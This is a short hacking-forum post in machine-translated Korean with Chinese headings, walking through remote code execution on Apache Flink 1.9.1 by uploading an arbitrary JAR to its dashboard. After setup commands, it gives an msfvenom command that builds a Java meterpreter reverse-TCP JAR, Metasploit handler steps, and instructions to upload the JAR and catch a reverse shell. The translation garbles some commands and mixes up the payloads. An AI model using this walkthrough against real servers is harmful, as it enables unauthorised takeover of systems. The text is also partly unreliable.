KoreanHackerTeam
Moderator
Apache Flink 任意 Jar 包上传导致 RCE 漏洞
Apache Flink는 유한하고 무한한 데이터 스트림에 대한 상태의 계산을 수행하는 분산 빅 데이터 처리 엔진입니다. 다양한 클러스터 환경에 배치하여 다양한 크기의 데이터 크기를 빠르게 계산할 수 있습니다.ApacheFlink는 Apache Software Foundation에서 개발 한 오픈 소스 스트림 처리 프레임 워크이며 핵심은 Java 및 Scala로 작성된 분산 스트리밍 데이터 스트리밍 엔진입니다. Flink는 데이터 병렬 처리 및 파이프 라인 모드에서 임의의 스트리밍 데이터 프로그램을 실행합니다. Flink의 파이프 라인 런타임 시스템은 배치 및 스트리밍 프로그램을 실행할 수 있습니다. 또한 Flink 런타임 자체는 반복 알고리즘의 실행을 지원합니다.
공격자는이 취약점을 사용하여 Apache Flink Dashboard 페이지에 JAR 패키지를 업로드하고 Metasploit을 사용하여 Apache Flink 서버에서 임의의 코드를 실행하여 서버의 최고 권한을 얻을 수 있으므로 더 유해합니다.
影响范围
Apache Flink=1.9.1环境搭建
다운로드 Apache Flink 1.9.1 패키지 :1
wget http://mirrors.tuna.tsinghua.edu.cn/apache/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz
설치 패키지를 압축 해제 :
1
tar –zxvf flink-1.9.1-bin-scala_2.11.tgz
빈 디렉토리를 입력하고 플링크를 시작하십시오.
1
./start-cluster.sh
브라우저 액세스 : http://ip:8081
漏洞复现
MSF는 리버스 쉘 말을 생성합니다1
msfvenom -p java/meterpreter/reverse_tcp lhost=ip lport=4444 -f jar shell.jar
MSF는 청취를 설정합니다
1
2
3
Exploit/Multi/Handler를 사용하십시오
페이로드 Java/Shell/Reverse_TCP를 설정하십시오
퇴장
Shell.jar를 업로드하고 제출하십시오
리바운드 쉘
